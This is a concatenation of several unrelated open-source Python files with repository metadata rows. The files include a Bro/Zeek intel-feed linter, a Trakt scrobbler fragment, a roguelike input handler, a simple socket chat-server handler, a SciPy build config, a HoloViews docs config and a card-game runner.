data['episode']['season'] = int(season_number)
data['episode']['number'] = int(episode_number)
data['progress'] = int(progress)
data['app_version'] = '1.0'
data['app_date'] = '2014-09-22'
json_data = json.dumps(data)
url = urlparse.urlunparse(('https', 'api-v2launch.trakt.tv', '/scrobble/' + scrobble_type, '', '', ''))
try:
self._do_trakt_auth_post(url, json_data)
except:
return False
return True
def scrobble_movie(self, imdb_id, progress, scrobble_type):
self.logger.info('Scrobbling ({scrobble_type}) {imdb_id} - {progress} to trak.tv.'
.format(imdb_id=imdb_id, scrobble_type=scrobble_type, progress=progress))
data = {}
data['movie'] = {}
data['movie']['ids'] = {}
data['movie']['ids']['imdb'] = imdb_id
data['progress'] = int(progress)
data['app_version'] = '1.0'
data['app_date'] = '2014-09-22'
json_data = json.dumps(data)
url = urlparse.urlunparse(('https', 'api-v2launch.trakt.tv', '/scrobble/' + scrobble_type, '', '', ''))
try:
self._do_trakt_auth_post(url, json_data)
except:
return False
return True
| mit | 7,181,757,827,706,876,000 | 32.19403 | 132 | 0.552158 | false | 3.633987 | false | false | false |
packetsled/bro_intel_linter | intel_linter.py | 1 | 26250 | #!/usr/bin/python
#
# MixMode.ai - Bro Intel Linter
#
# WHEN WHAT WHO
# 03-04-2015 Initial development Aaron Eppert
# 08-24-2015 Explicitly verify single character fields Aaron Eppert
# 08-24-2015 GPL and pushed to GitHub Aaron Eppert
# 08-25-2015 Small cleanups and proper exit codes for using
# as a git pre-commit hook Aaron Eppert
# 09-01-2015 Added column-based type verifications Aaron Eppert
# 09-25-2015 Verify printable characters and escape in error Aaron Eppert
# 10-07-2015 Added --psled and --warn-only options Aaron Eppert
# 10-08-2015 Additional details - WARNING vs ERROR Aaron Eppert
# 03-03-2016 Minor bugfix Peter McKay
# 04-08-2016 Added Intel::NET support Aaron Eppert
# 06-02-2017 Fixed line ending issue Aaron Eppert
# 09-15-2017 Changed Intel::NET to Intel::SUBNET Kory Kyzar
# 03-28-2018 Fixed IPv6 validation Aaron Eppert
# 03-27-2019 Add Intel::PUBKEY_HASH and Intel::JA3 Aaron Eppert
# 07-13-2019 Add CERT HASH validaion for using regex Juan Jaramillo
# MD5, SHA1, SHA256, SHA512 hashes.
import sys
import re
import string
from optparse import OptionParser
def write_stderr(msg):
sys.stderr.write(msg + '\n')
def warning_line(line, *objs):
out = 'WARNING: Line %d - ' % (int(line)+1)
for o in objs:
out += o
write_stderr(out)
def error_line(line, *objs):
out = 'ERROR: Line %d - ' % (int(line)+1)
for o in objs:
out += o
write_stderr(out)
def escape(c):
if ord(c) > 31 and ord(c) < 127:
return c
c = ord(c)
if c <= 0xff:
return r'\x{0:02x}'.format(c)
elif c <= '\uffff':
return r'\u{0:04x}'.format(c)
else:
return r'\U{0:08x}'.format(c)
def hex_escape(s):
return ''.join(escape(c) for c in s)
class bro_intel_indicator_return:
OKAY = 0
WARNING = 1
ERROR = 2
###############################################################################
# class bro_intel_indicator_type
#
# This class is for handling the "indicator_type" fields within a Bro Intel
# file. Note, each type of field has a specific handler.
#
class bro_intel_indicator_type:
def __init__(self):
self.__INDICATOR_TYPE_handler = {'Intel::ADDR': self.__handle_intel_addr,
'Intel::SUBNET': self.__handle_intel_subnet,
'Intel::URL': self.__handle_intel_url,
'Intel::SOFTWARE': self.__handle_intel_software,
'Intel::EMAIL': self.__handle_intel_email,
'Intel::DOMAIN': self.__handle_intel_domain,
'Intel::USER_NAME': self.__handle_intel_user_name,
'Intel::FILE_HASH': self.__handle_intel_file_hash,
'Intel::FILE_NAME': self.__handle_intel_file_name,
'Intel::CERT_HASH': self.__handle_intel_cert_hash,
'Intel::PUBKEY_HASH': self.__handle_intel_pubkey_hash,
'Intel::JA3': self.__handle_intel_ja3_hash}
# Source: https://stackoverflow.com/questions/319279/how-to-validate-ip-address-in-python
def __is_valid_ipv4_address(self, address):
import socket
try:
socket.inet_pton(socket.AF_INET, address)
except AttributeError: # no inet_pton here, sorry
try:
socket.inet_aton(address)
except socket.error:
return False
return address.count('.') == 3
except socket.error: # not a valid address
return False
return True
# Source: https://stackoverflow.com/questions/319279/how-to-validate-ip-address-in-python
def __is_valid_ipv6_address(self, address):
import socket
try:
socket.inet_pton(socket.AF_INET6, address)
except socket.error: # not a valid address
return False
return True
def __handle_intel_addr(self, indicator):
ret = (bro_intel_indicator_return.OKAY, None)
if self.__is_valid_ipv4_address(indicator) or self.__is_valid_ipv6_address(indicator):
return ret
return (bro_intel_indicator_return.ERROR, 'Invalid IP address')
# In an effort to keep this script minimal and without requiring external
# libraries, we will verify an Intel::SUBNET simply as:
#
# 0 <= octet < 255
# 0 <= netmask <= 32
#
def __handle_intel_subnet(self, indicator):
ret = (bro_intel_indicator_return.OKAY, None)
if '/' in indicator:
addr, net = indicator.split('/')
if all([(int(x) >= 0 and int(x) < 255) for x in addr.split('.')]):
if not (int(net) >= 0 and int(x) <= 32):
ret = (bro_intel_indicator_return.ERROR, 'Invalid network block designation')
else:
ret = (bro_intel_indicator_return.ERROR, 'Invalid network address')
else:
ret = (bro_intel_indicator_return.ERROR, 'Invalid network designation')
return ret
# We will call this minimalist, but effective.
def __handle_intel_url(self, indicator):
ret = (bro_intel_indicator_return.OKAY, None)
t_uri_present = re.findall(r'^https?://', indicator)
if t_uri_present is not None and len(t_uri_present) > 0:
ret = (bro_intel_indicator_return.WARNING, 'URI present (e.g. http(s)://)')
else:
rx = re.compile(r'^[https?://]?' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
t = rx.search(indicator)
if t:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_email(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid email address')
rx = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"
t_email = re.findall(rx, indicator)
if len(t_email) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_software(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid software string')
if len(indicator) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_domain(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid domain name')
rx = r'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}(?<!-)\.)+[a-zA-Z]{2,63}$)'
t_domain = re.findall(rx, indicator)
if len(t_domain) > 0:
if indicator in t_domain[0]:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_user_name(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid username - %s' % (indicator))
if len(indicator) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_file_name(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid username length')
if len(indicator) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
# Pretty weak, but should suffice for now.
def __handle_intel_file_hash(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid hash length')
VALID_HASH_LEN = {32: 'md5',
40: 'sha1',
64: 'sha256'}
if VALID_HASH_LEN.get(len(indicator), None):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_cert_hash(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid Intel::CERT_HASH - ISSUES %s' % (indicator))
hash_present = re.compile(
r'^[0-9A-F]{32}$|' # MD5
r'^[0-9A-F]{40}$|' # SHA1
r'^[0-9A-F]{64}$|' # SHA256
r'^[0-9A-F]{128}$', re.IGNORECASE) # SHA512
t = hash_present.search(indicator)
if t:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_pubkey_hash(self, indicator):
return (bro_intel_indicator_return.WARNING, 'Intel::PUBKEY_HASH - Needs additional validation')
def __handle_intel_ja3_hash(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Intel::JA3 - Needs additional validation')
if len(indicator) == 32:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_indicator_type(self, indicator_type):
ret = (bro_intel_indicator_return.ERROR, 'Invalid indicator - %s' % (indicator_type))
it = self.__INDICATOR_TYPE_handler.get(indicator_type, None)
if it is not None:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def correlate(self, indicator, indicator_type):
ret = (bro_intel_indicator_return.WARNING, 'Could not correlate - %s with %s' % (indicator, indicator_type))
if len(indicator) > 1 and len(indicator_type) > 1:
h = self.__INDICATOR_TYPE_handler.get(indicator_type, None)
if h:
ret = h(indicator)
else:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
###############################################################################
# class bro_data_intel_field_values
#
# This class is for processing the individual Bro Intel fields and verifying
# their validity.
#
# Note, it may be easily expanded via adding entries to self.__VERIFY within
# the class constructor.
#
class bro_data_intel_field_values:
EMPTY_FIELD_CHAR = '-'
META_DO_NOTICE = ['T', 'F']
META_IF_IN = ['-',
'Conn::IN_ORIG',
'Conn::IN_RESP',
'Files::IN_HASH',
'Files::IN_NAME',
'DNS::IN_REQUEST',
'DNS::IN_RESPONSE',
'HTTP::IN_HOST_HEADER',
'HTTP::IN_REFERRER_HEADER',
'HTTP::IN_USER_AGENT_HEADER',
'HTTP::IN_X_FORWARDED_FOR_HEADER',
'HTTP::IN_URL',
'SMTP::IN_MAIL_FROM',
'SMTP::IN_RCPT_TO',
'SMTP::IN_FROM',
'SMTP::IN_TO',
'SMTP::IN_RECEIVED_HEADER',
'SMTP::IN_REPLY_TO',
'SMTP::IN_X_ORIGINATING_IP_HEADER',
'SMTP::IN_MESSAGE',
'SSL::IN_SERVER_CERT',
'SSL::IN_CLIENT_CERT',
'SSL::IN_SERVER_NAME',
'SMTP::IN_HEADER']
def __init__(self):
self.__VERIFY = {'indicator': self.verify_indicator,
'indicator_type': self.verify_indicator_type,
'meta.do_notice': self.verify_meta_do_notice,
'meta.if_in': self.verify_meta_if_in,
'meta.desc': self.verify_meta_desc,
'meta.source': self.verify_meta_source,
'meta.cif_confidence': self.verify_meta_cif_confidence,
'meta.url': self.verify_meta_url,
'meta.whitelist': self.verify_meta_whitelist,
'meta.severity': self.verify_meta_severity,
'meta.cif_severity': self.verify_meta_cif_severity,
'meta.cif_impact': self.verify_meta_cif_impact}
self.biit = bro_intel_indicator_type()
def get_verifier(self, v):
return self.__VERIFY.get(v, self.default)
def __verify_chars(self, t):
return all(ord(l) > 31 and ord(l) < 127 and l in string.printable for l in t)
def __is_ignore_field(self, t):
return self.EMPTY_FIELD_CHAR in t
def verify_indicator(self, t):
ret = (bro_intel_indicator_return.ERROR, 'Invalid indicator - %s' % (t))
if len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_indicator_type(self, t):
return self.biit.verify_indicator_type(t)
def correlate_indictor_and_indicator_type(self, i, it):
return self.biit.correlate(i, it)
def verify_meta_do_notice(self, t):
ret = (bro_intel_indicator_return.OKAY, None)
t_ret = t in bro_data_intel_field_values.META_DO_NOTICE
if not t_ret:
ret = (bro_intel_indicator_return.ERROR, 'Invalid do_notice - %s' % (str(t)))
return ret
def verify_meta_if_in(self, t):
ret = (bro_intel_indicator_return.OKAY, None)
t_ret = t in bro_data_intel_field_values.META_IF_IN
if not t_ret:
ret = (bro_intel_indicator_return.ERROR, 'Invalid if_in - %s' % (str(t)))
return ret
def verify_meta_cif_confidence(self, t):
ret = (bro_intel_indicator_return.ERROR, 'Invalid confidence - %s - Needs to be 1-100' % (str(t)))
try:
t_int = int(t)
if isinstance(t_int, (int, long)) and (t_int > 0 and t_int < 100):
ret = (bro_intel_indicator_return.OKAY, None)
except ValueError:
ret = (bro_intel_indicator_return.ERROR, 'Invalid confidence - %s - Needs to be 1-100' % (str(t)))
return ret
def verify_meta_desc(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid desc - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_source(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid source - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_url(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid url - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_whitelist(self, t):
ret = (bro_intel_indicator_return.OKAY, 'Invalid whitelist - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_severity(self, t):
ret = (bro_intel_indicator_return.ERROR, 'Invalid severity - %s (valid: 1-10)' % (t))
try:
t_int = int(t)
if isinstance(t_int, (int, long)) and (t_int > 0 and t_int < 10):
ret = (bro_intel_indicator_return.OKAY, None)
except ValueError:
ret = (bro_intel_indicator_return.ERROR, 'Invalid severity - %s (valid: 1-10)' % (t))
return ret
def verify_meta_cif_severity(self, t):
VALID_SEVERITY = ['-', 'low', 'medium', 'med', 'high']
ret = (bro_intel_indicator_return.ERROR, 'Invalid cif_severity - %s (valid: %s)' % (t, ','.join(VALID_SEVERITY)))
if t in VALID_SEVERITY:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_cif_impact(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid cif_impact - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def default(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid - %s' % (t))
write_stderr("Running default handler for: %s" % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
###############################################################################
# class bro_intel_feed_verifier
#
# This is the control class for Bro Intel Feed verification
#
class bro_intel_feed_verifier:
stock_required_fields = ['indicator',
'indicator_type',
'meta.source']
psled_required_fields = ['indicator',
'indicator_type',
'meta.source',
'meta.desc']
field_header_designator = '#fields'
feed_rx = r'([\S]+)'
feed_sep_rx = r'(\t)+'
header_fields = []
def __init__(self, options):
self.feed_file = options.feed_file
self.psled = options.psled
self.__feed_header_found = False
self.__num_of_fields = 0
self.required_fields = bro_intel_feed_verifier.stock_required_fields
self.warn_only = options.warn_only
if self.psled is not None:
self.required_fields = bro_intel_feed_verifier.psled_required_fields
def __make_one_indexed(self, l):
return map(lambda x: x+1, l)
def __is_start_of_feed(self, l):
ret = False
if len(l) >= 2:
if l[0] == self.field_header_designator:
ret = True
return ret
def __are_header_fields_valid(self, l):
ret = False
_fields_found = []
if l[0] == self.field_header_designator:
for index, item in enumerate(l):
if index == 0:
continue
if item in self.required_fields:
_fields_found.append(item)
self.header_fields.append(item)
t_list_diff = list(set(self.required_fields) - set(_fields_found))
if len(t_list_diff) == 0:
ret = True
else:
warning_line(0, 'Fields missing: %s' % (','.join(t_list_diff)))
return ret
def __count_fields(self, l):
return (len(l) - 1)
##
# <0 - Too few fields
# 0 - Proper field count
# >0 - Too many fields
##
def __verify_field_count(self, l):
return (len(l) - self.__num_of_fields)
def __verify_non_space(self, offset, l):
ret = True
r = [i for i, x in enumerate(l) if x == ' ']
if len(r) > 0:
warning_line(offset, 'Invalid empty field, offset %s' % (self.__make_one_indexed(r)))
ret = False
return ret
def __get_field_contents(self, l):
return l.split('\t')
def __verify_field_sep(self, offset, l, is_header=False):
ret = True
field_seps = re.findall(self.feed_sep_rx, l, re.IGNORECASE)
__field_total = self.__num_of_fields
if is_header:
__field_total += 1
if len(field_seps) >= __field_total:
warning_line(offset, 'Excess field separators found')
ret = False
for index, item in enumerate(field_seps):
for s in item:
if s != '\t':
warning_line(offset, 'Field separator incorrect in field offset %d' % (self.__make_one_indexed(index)))
ret = False
return ret
def __verify_header(self, index, l):
ret = False
contents = self.__get_field_contents(l)
if self.__is_start_of_feed(contents) and self.__are_header_fields_valid(contents):
if not self.__feed_header_found:
self.__num_of_fields = self.__count_fields(contents)
if self.__verify_field_sep(index, l, is_header=True):
ret = True
self.__feed_header_found = True
else:
write_stderr("Invalid field separator found in header. Must be a tab.")
else:
warning_line(index, "Duplicate header found")
return ret
def __verify_fields(self, index, content):
ret = (bro_intel_indicator_return.OKAY, None)
reason = ''
_fields_to_process = {}
validator = bro_data_intel_field_values()
#
# Not thrilled about this, but we need it to pull out correlatable fields
# since, order of the actual feed fields aren't guaranteed. Ugly for now,
# but workable and can likely be optimized shortly.
#
for content_index, t in enumerate(content):
_fields_to_process[self.header_fields[content_index]] = t
for k in _fields_to_process:
ret = validator.get_verifier(k)(_fields_to_process[k])
if len(ret) > 0 and ret[0] != bro_intel_indicator_return.OKAY:
if all(ord(l) > 31 and ord(l) < 127 and l in string.printable for l in k):
t_line = str(_fields_to_process[k])
t_line = hex_escape(t_line)
warning_line(index, 'Invalid entry \"%s\" for column \"%s\"' % (str(t_line), str(k)))
else:
warning_line(index, 'Unprintable character found for column \"%s\"' % (str(k)))
break
if ret:
# Special case to verify indicator with indicator_type
c = validator.correlate_indictor_and_indicator_type(_fields_to_process['indicator'],
_fields_to_process['indicator_type'])
if c is not None:
if c[0] == bro_intel_indicator_return.WARNING:
warning_line(index, 'Indicator type \"%s\" possible issue with indicator: \"%s\"' % (_fields_to_process['indicator_type'], _fields_to_process['indicator']))
elif c[0] == bro_intel_indicator_return.ERROR:
error_line(index, 'Indicator type \"%s\" possible issue with indicator: \"%s\"' % (_fields_to_process['indicator_type'], _fields_to_process['indicator']))
ret = c
return ret
def __verify_entry(self, index, l):
ret = (bro_intel_indicator_return.ERROR, '')
contents = self.__get_field_contents(l)
_content_field_count = self.__verify_field_count(contents)
_warn_str = None
if _content_field_count == 0:
if self.__verify_field_sep(index, l) and self.__verify_non_space(index, contents):
ret = self.__verify_fields(index, contents)
elif _content_field_count > 0:
ret = (bro_intel_indicator_return.ERROR, 'Invalid number of fields - Found: %d, Header Fields: %d - Look for: EXTRA fields or tab seperators' % (len(contents), self.__num_of_fields))
elif _content_field_count < 0:
ret = (bro_intel_indicator_return.ERROR, 'Invalid number of fields - Found: %d, Header Fields: %d - Look for: EMPTY fields' % (len(contents), self.__num_of_fields))
return ret
def __load_feed(self, feed):
with open(feed) as f:
for line in f:
t_line = line.rstrip('\r\n')
if len(t_line):
yield t_line
def __handle_reporting(self, index, c):
if c is not None:
if c[0] == bro_intel_indicator_return.ERROR:
error_line(index, 'Details - %s' % (c[1]))
elif c[0] == bro_intel_indicator_return.WARNING:
warning_line(index, c[1])
def verify(self):
for index, l in enumerate(self.__load_feed(self.feed_file)):
# Check the header
if index == 0:
if not self.__verify_header(index, l):
error_line(index, "Invalid header")
sys.exit(2)
else:
t_ret = self.__verify_entry(index, l)
if t_ret[0] != bro_intel_indicator_return.OKAY:
self.__handle_reporting(index, t_ret)
if t_ret[0] == bro_intel_indicator_return.ERROR and self.warn_only is None:
sys.exit(3)
###############################################################################
# main()
###############################################################################
def main():
parser = OptionParser()
parser.add_option('-f', '--file', dest='feed_file', help='Bro Intel Feed to Verify')
parser.add_option('--psled', action='store_true', dest='psled', help='Verify Intel meets PacketSled requirements')
parser.add_option('--warn-only', action='store_true', dest='warn_only', help='Warn ONLY on errors, continue processing and report')
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
bifv = bro_intel_feed_verifier(options)
bifv.verify()
###############################################################################
# __name__ checking
###############################################################################
if __name__ == '__main__':
main()
| gpl-3.0 | 3,333,144,674,259,233,000 | 40.403785 | 194 | 0.523048 | false | 3.75 | false | false | false |
Pymatteo/QtNMR | build/exe.win32-3.4/scipy/__config__.py | 1 | 1547 | # This file is generated by C:\Users\asd\src\34\scipy-0.15.1\setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
atlas_threads_info={}
openblas_info={}
lapack_mkl_info={}
blas_mkl_info={}
lapack_opt_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['lapack', 'f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'f77'}
atlas_blas_threads_info={}
blas_opt_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'c'}
atlas_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['lapack', 'f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'f77'}
atlas_blas_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'c'}
mkl_info={}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
| gpl-3.0 | 3,856,228,979,932,694,000 | 47.967742 | 186 | 0.557207 | false | 2.941065 | false | false | false |
Kromey/roglick | roglick/systems/input.py | 1 | 3339 | import time
from roglick.lib import libtcod
from roglick.engine.ecs import SystemBase
from roglick.components import FatigueComponent,PositionComponent
from roglick.events import ClimbDownEvent,ClimbUpEvent,MoveEvent,QuitEvent,PreInputEvent
from roglick.engine import event
class InputSystem(SystemBase):
# Define movement keys with corresponding (dx,dy) tuples
MOVEMENT_KEYS = {
libtcod.KEY_KP1: (-1,1),
libtcod.KEY_KP2: (0,1),
libtcod.KEY_KP3: (1,1),
libtcod.KEY_KP4: (-1,0),
libtcod.KEY_KP6: (1,0),
libtcod.KEY_KP7: (-1,-1),
libtcod.KEY_KP8: (0, -1),
libtcod.KEY_KP9: (1,-1),
'y': (-1,-1),
'u': (1,-1),
'h': (-1,0),
'j': (0,1),
'k': (0,-1),
'l': (1,0),
'b': (-1,1),
'n': (1,1),
}
def execute(self):
"""Wait for player input, dispatching appropriate events."""
pc = self._entity_manager.pc
pc_fatigue = self._entity_manager.get_component(pc, FatigueComponent)
if pc_fatigue.fatigue > 0:
# PC's still fatigued, need to wait until they can act
return
event.dispatch(PreInputEvent())
key = self.get_keypress()
if key == libtcod.KEY_ESCAPE or libtcod.console_is_window_closed():
event.dispatch(QuitEvent()) #exit game
# Movement keys
if key in self.MOVEMENT_KEYS:
event.dispatch(MoveEvent(pc, *self.MOVEMENT_KEYS[key]))
elif key == '>':
event.dispatch(ClimbDownEvent(pc))
elif key == '<':
event.dispatch(ClimbUpEvent(pc))
def get_keypress(self):
"""Wrapper method for retrieving keypress events from the keyboard
A bug(?) in libtcod means that the wait_for_keypress function actually
returns key press AND release events, resulting in each tap of a key
functioning as two "keypress" events. To work around this, we wait for
a key and then test if it is actually in the 'pressed' state and, if
not, wait again.
This wrapper also checks for printable keys and translates key.c into
the corresponding character.
"""
while True:
key = libtcod.console_wait_for_keypress(True)
#if not key.pressed and key.vk != libtcod.KEY_NONE:
# # Make sure we actually get a pressed key
# return self.get_keypress()
if key.vk == libtcod.KEY_SHIFT or key.vk == libtcod.KEY_CONTROL:
# We don't care about these keys, just ignore them
continue
if key.pressed:
if key.vk == libtcod.KEY_F12:
# Take a screenshot, pause briefly, then resume waiting
libtcod.sys_save_screenshot()
time.sleep(0.5)
elif key.vk == libtcod.KEY_CHAR:
# Translate key.c into its character reprsentation
return chr(key.c)
else:
# Return the key code
return key.vk
elif key.vk == libtcod.KEY_NONE:
# Ensure non-key events (e.g. closing the window) can propagate
return None
| mit | 4,605,689,450,673,225,000 | 35.293478 | 88 | 0.556155 | false | 3.777149 | false | false | false |
fansubgroup/Kerrigan1.x-server | ServerClone.py | 1 | 2507 | #!/usr/bin/env python
from multiprocessing import Process, Queue
from multiprocessing.reduction import reduce_handle, rebuild_handle
import os
import socket
import time
import threading
import json
import Skateboard
def server(s_to_client, PASSWD, addrnew, process_id, client_pipe):
print('ServerClone is ok.')
data = s_to_client.recv(4096)
SERVERINFO = '@Author: East Evil\nDefault Message From Server\nAnd You Can Change This Information By Youself'
if data:
#print data
fuck_json_0 = json.dumps(['', "%s\nPlease enter passwd:" % SERVERINFO])
s_to_client.sendall(fuck_json_0)
data_0 = s_to_client.recv(4096)
if data_0 == PASSWD:
fuck_json_x = json.dumps(['', 'Permit access to login the server...\nInput a name for show you friends'])
s_to_client.sendall(fuck_json_x)
name_once = s_to_client.recv(4096)
# message to staff [0] is command
message_to_ec = ['UPDATE CLIENT SOCKET']
# message to staff [1] is socket owner name
message_to_ec.append(name_once)
# message to staff [2] is socket
s_to_client_reduction = reduce_handle(s_to_client.fileno())
message_to_ec.append(s_to_client_reduction)
# messaget to staff [3] is socket to recveive result from staff
message_to_ec.append(process_id)
# 0 1 2 3
# message send to ec [command, name, client_socket, process_id]
# put into pipe
client_pipe.send(message_to_ec)
fuck_json = json.dumps(['Server Room', 'Ok, server get you name [%s]\nEnter the chat room...' % name_once])
s_to_client.sendall(fuck_json)
Skateboard.smooth(s_to_client, client_pipe, name_once, process_id)
else:
print 'Error password'
log_file = open('temp/log-server.log')
t_0 = time.localtime()
now_time_0 = "%d-%d-%d-%d:%d:%d" % (t_0.tm_year, t_0.tm_mon, t_0.tm_mday, t_0.tm_hour, t_0.tm_min, t_0.tm_sec)
log_file.writelines("ip:%s, port:%s failed to login at %s\n" % (addrnew[0], addrnew[1], now_time_0))
log_file.close()
err_json = json.dumps(['Error Password', 'Have no permission to enter the server'])
s_to_client.sendall(err_json)
self.CONNECTION_LIST.remove(s_to_client)
s_to_client.close()
| gpl-3.0 | -3,393,982,700,760,976,000 | 28.845238 | 122 | 0.583167 | false | 3.477115 | false | false | false |
basnijholt/holoviews | doc/conf.py | 1 | 2564 | # -*- coding: utf-8 -*-
from nbsite.shared_conf import *
# Declare information specific to this project.
project = u'HoloViews'
authors = u'PyViz developers'
copyright = u'2019 ' + authors
description = 'Stop plotting your data - annotate your data and let it visualize itself.'
import holoviews
version = release = holoviews.__version__
html_theme = 'sphinx_ioam_theme'
html_static_path += ['_static']
html_theme_options = {
'logo': 'logo.png',
'favicon': 'favicon.ico',
'custom_css': 'holoviews.css'
}
nbbuild_cell_timeout = 360
extensions += ['nbsite.gallery']
templates_path = ['_templates']
nbsite_gallery_conf = {
'backends': ['bokeh', 'matplotlib', 'plotly'],
'galleries': {},
'github_org': 'pyviz',
'github_project': 'holoviews'
}
if os.environ.get('HV_DOC_GALLERY') not in ('False', 'false', '0'):
nbsite_gallery_conf['galleries']['gallery'] = {
'title': 'Gallery',
'sections': [
{'path': 'apps', 'title': 'Applications', 'skip': True},
'demos'
]
}
if os.environ.get('HV_DOC_REF_GALLERY') not in ('False', 'false', '0'):
nbsite_gallery_conf['galleries']['reference'] = {
'title': 'Reference Gallery',
'path': 'reference',
'sections': [
'elements',
'containers',
'streams',
'apps'
]
}
MAIN_SITE = '//holoviews.org'
html_context.update({
'PROJECT': project,
'DESCRIPTION': description,
'AUTHOR': authors,
'VERSION': version,
'WEBSITE_SERVER': 'https:',
# Links
'LINKS': (
('Getting started', '/getting_started/index'),
('User Guide', '/user_guide/index'),
('Gallery', '/gallery/index'),
('Reference Gallery', '/reference/index'),
('API Docs', '/Reference_Manual/index'),
('FAQ', '/FAQ'),
('About', '/about')
),
# About Links
'ABOUT': (
('About', '/about.html')
),
# Social links
'SOCIAL': (
('Gitter', '//gitter.im/pyviz/pyviz'),
('Twitter', '//twitter.com/holoviews'),
('Github', '//github.com/pyviz/holoviews'),
),
# Links for the docs sub navigation
'NAV': (
('Getting started', 'getting_started/index'),
('User Guide', 'user_guide/index'),
('Gallery', 'gallery/index'),
('Reference Gallery', 'reference/index'),
('Releases', 'releases'),
('API', 'Reference_Manual/index'),
('FAQ', 'FAQ')
),
'js_includes': html_context['js_includes']+['holoviews.js']
})
| bsd-3-clause | 7,038,576,219,516,057,000 | 26.276596 | 89 | 0.555772 | false | 3.418667 | false | false | false |
marxsk/nimmt6 | runner.py | 1 | 1381 | #!/usr/bin/python
""" Single-player game - Nimmt6 with two players and open cards """
import game, player, card
# 10.000 round / 5 seconds with Firstplayer
ROUNDS = 10000
def play():
""" Main function which defines set of games for comuter bots or single game vs human"""
bots = [ player.Firstplayer(), player.Randomplayer(), player.Minsumplayer(), player.Minimizenegative() ]
mainbot = player.Minimizenegative()
valuation = card.get_standard_value_of_card
# valuation = card.get_single_value_of_card
human = True
human = False
if not human:
for bot in bots:
score = 0
for round_number in range(ROUNDS):
game_instance = game.Nimmtgame(seed = round_number, valuation = valuation)
game_instance.add_player("bot: MAIN", mainbot)
game_instance.add_player("bot: SIDE", bot)
results = game_instance.start()
if results[0] < results[1]:
score += 1
elif results[1] < results[0]:
score -= 1
print "%s : %s = %s" % (mainbot, bot, score)
else:
game_instance = game.Nimmtgame(verbose = True, valuation = valuation)
game_instance.add_player("bot: MAIN", mainbot)
game_instance.add_player("Human", player.Humanplayer())
